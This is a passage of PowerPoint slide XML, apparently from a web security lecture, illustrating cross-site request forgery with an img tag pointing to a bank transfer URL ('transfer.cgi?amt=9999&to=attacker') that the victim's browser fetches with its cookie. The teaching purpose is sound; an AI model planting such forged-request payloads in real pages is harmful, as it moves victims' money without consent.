                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" spc="-4" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=“http://HabibBank</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82959" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7ECC18E-E9DE-C94E-A63C-8E025A2C6CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-720000">
            <a:off x="3178175" y="3719513"/>
            <a:ext cx="50053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14375">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="714375">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="714375">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="714375">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="714375">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="714375"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4375"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4375"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4375"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1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer.cgi?amt=9999&amp;to=attacker”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82960" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC129671-AFA9-D942-9AF3-833C38FF245C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5784850"/>
            <a:ext cx="3749675"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01000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser automatically  visits the URL to obtain  what it believes will be  an image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82961" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9184B6-56B3-D741-9EF8-41E42DC4EB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7773988" y="4994275"/>
            <a:ext cx="2132012" cy="16954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2962" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AE0A65-6030-EE4D-A88F-7FA7160A0669}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="5029200"/>
            <a:ext cx="2051050" cy="16097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2963" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B359DA-ACF4-174D-BF8A-520727BC9B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="5029200"/>
            <a:ext cx="2051050" cy="1609725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2586990"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 15658 w 2586990"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 15658 w 2586990"/>
              <a:gd name="T5" fmla="*/ 46854 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 2586990"/>
              <a:gd name="T7" fmla="*/ 46854 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 2586990"/>
              <a:gd name="T9" fmla="*/ 0 h 190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6990" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2586685" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2586685" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0"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964" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F970CEF3-E836-E745-8F69-290AF158E54B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7970838" y="5576888"/>
            <a:ext cx="1568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3150"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82965" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B13D42-4AB6-2746-A8AE-DC02D266B07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="3419475" y="5384800"/>
            <a:ext cx="380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138"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>HabibB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ank.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82966" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B21FA6-7E8F-A647-8FD0-BAFE07AAD899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="780000">
            <a:off x="2600325" y="5648325"/>
            <a:ext cx="4976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075"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer.cgi?amt=9999&amp;to=attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB91FEC0-3F7E-1B42-AB4B-C67F38C96B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="4648200"/>
            <a:ext cx="5251450"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2968" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268E372F-8E6A-DF46-8FAB-227E4C6C7635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="541338" y="4552950"/>
            <a:ext cx="1114425" cy="5524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0" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A431E8F9-6391-2445-853C-13DFA3B71D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696913" y="4191000"/>
            <a:ext cx="1055687" cy="779463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1293691">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12682">
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82970" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E7D2CB3-1FAC-3149-859C-B895C745B330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3844925"/>
            <a:ext cx="1411288" cy="6032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2971" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E13B50-219E-194D-A0B8-15EC48414E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100" y="3895725"/>
            <a:ext cx="1309688" cy="50165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82972" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6439795C-D0BF-AF4D-9DB6-F297C9FE1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100" y="3895725"/>
            <a:ext cx="1309688" cy="501650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T1" fmla="*/ 0 h 501650"/>
              <a:gd name="T2" fmla="*/ 120719 w 1309370"/>
              <a:gd name="T3" fmla="*/ 0 h 501650"/>
              <a:gd name="T4" fmla="*/ 73736 w 1309370"/>
              <a:gd name="T5" fmla="*/ 9436 h 501650"/>
              <a:gd name="T6" fmla="*/ 35369 w 1309370"/>
              <a:gd name="T7" fmla="*/ 35169 h 501650"/>
              <a:gd name="T8" fmla="*/ 9480 w 1309370"/>
              <a:gd name="T9" fmla="*/ 73337 h 501650"/>
              <a:gd name="T10" fmla="*/ 0 w 1309370"/>
              <a:gd name="T11" fmla="*/ 120078 h 501650"/>
              <a:gd name="T12" fmla="*/ 0 w 1309370"/>
              <a:gd name="T13" fmla="*/ 381076 h 501650"/>
              <a:gd name="T14" fmla="*/ 9480 w 1309370"/>
              <a:gd name="T15" fmla="*/ 427816 h 501650"/>
              <a:gd name="T16" fmla="*/ 35369 w 1309370"/>
              <a:gd name="T17" fmla="*/ 465985 h 501650"/>
              <a:gd name="T18" fmla="*/ 73736 w 1309370"/>
              <a:gd name="T19" fmla="*/ 491718 h 501650"/>
              <a:gd name="T20" fmla="*/ 120719 w 1309370"/>
              <a:gd name="T21" fmla="*/ 501154 h 501650"/>
              <a:gd name="T22" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T23" fmla="*/ 501154 h 501650"/>
              <a:gd name="T24" fmla="*/ 1242573 w 1309370"/>
              <a:gd name="T25" fmla="*/ 491718 h 501650"/>
              <a:gd name="T26" fmla="*/ 1280951 w 1309370"/>
              <a:gd name="T27" fmla="*/ 465985 h 501650"/>
              <a:gd name="T28" fmla="*/ 1306823 w 1309370"/>
              <a:gd name="T29" fmla="*/ 427816 h 501650"/>
              <a:gd name="T30" fmla="*/ 1316309 w 1309370"/>
              <a:gd name="T31" fmla="*/ 381076 h 501650"/>
              <a:gd name="T32" fmla="*/ 1316309 w 1309370"/>
              <a:gd name="T33" fmla="*/ 120078 h 501650"/>
              <a:gd name="T34" fmla="*/ 1306823 w 1309370"/>
              <a:gd name="T35" fmla="*/ 73337 h 501650"/>
              <a:gd name="T36" fmla="*/ 1280951 w 1309370"/>
              <a:gd name="T37" fmla="*/ 35169 h 501650"/>
              <a:gd name="T38" fmla="*/ 1242573 w 1309370"/>
              <a:gd name="T39" fmla="*/ 9436 h 501650"/>
              <a:gd name="T40" fmla="*/ 1195575 w 1309370"/>
              <a:gd name="T41" fmla="*/ 0 h 5016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9370" h="501650">
                <a:moveTo>
                  <a:pt x="1189205" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120081" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73340" y="9436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35171" y="35169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9436" y="73337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="381076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9436" y="427816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35171" y="465985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73340" y="491718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120081" y="501154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189205" y="501154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235953" y="491718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1274125" y="465985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299860" y="427816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309296" y="381076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1309296" y="120078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299860" y="73337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1274125" y="35169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235953" y="9436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1189205" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00D02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973" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5807468-74E7-F740-AFCB-EFEEAE6413A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="163513" y="4000500"/>
            <a:ext cx="10620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1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82974" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91ECCEB7-6C79-FB4B-AD9F-83A84291C39D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="223838" y="4402138"/>
            <a:ext cx="95250" cy="361950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 109546 w 94614"/>
              <a:gd name="T1" fmla="*/ 361732 h 361950"/>
              <a:gd name="T2" fmla="*/ 50622 w 94614"/>
              <a:gd name="T3" fmla="*/ 310812 h 361950"/>
              <a:gd name="T4" fmla="*/ 29716 w 94614"/>
              <a:gd name="T5" fmla="*/ 270240 h 361950"/>
              <a:gd name="T6" fmla="*/ 14314 w 94614"/>
              <a:gd name="T7" fmla="*/ 225176 h 361950"/>
              <a:gd name="T8" fmla="*/ 4408 w 94614"/>
              <a:gd name="T9" fmla="*/ 175621 h 361950"/>
              <a:gd name="T10" fmla="*/ 0 w 94614"/>
              <a:gd name="T11" fmla="*/ 121573 h 361950"/>
              <a:gd name="T12" fmla="*/ 1084 w 94614"/>
              <a:gd name="T13" fmla="*/ 63033 h 361950"/>
              <a:gd name="T14" fmla="*/ 7664 w 94614"/>
              <a:gd name="T15" fmla="*/ 0 h 3619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4614" h="361950">
                <a:moveTo>
                  <a:pt x="94534" y="361732"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43681" y="310812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25644" y="270240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12352" y="225176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3804" y="175621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936" y="63033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6614"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2975" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDAAD54-76F4-6F48-9278-95C2B0DBBAB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="230188" y="4633913"/>
            <a:ext cx="290512" cy="234950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 124019 w 290195"/>
              <a:gd name="T1" fmla="*/ 0 h 235585"/>
              <a:gd name="T2" fmla="*/ 0 w 290195"/>
              <a:gd name="T3" fmla="*/ 215840 h 235585"/>
              <a:gd name="T4" fmla="*/ 296625 w 290195"/>
              <a:gd name="T5" fmla="*/ 222015 h 235585"/>
              <a:gd name="T6" fmla="*/ 124019 w 290195"/>
              <a:gd name="T7" fmla="*/ 0 h 2355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195" h="235585">
                <a:moveTo>
                  <a:pt x="121076" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="229044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="235597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1210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2976" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C257432-04B0-6444-8B79-E2D50B7D5598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5646738" y="4933950"/>
            <a:ext cx="1114425" cy="5524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38" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40FCBC0E-E59E-274E-97BB-C972D0F83D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5802313" y="4572000"/>
            <a:ext cx="1055687" cy="779463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1293691">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12682">
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82978" name="object 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
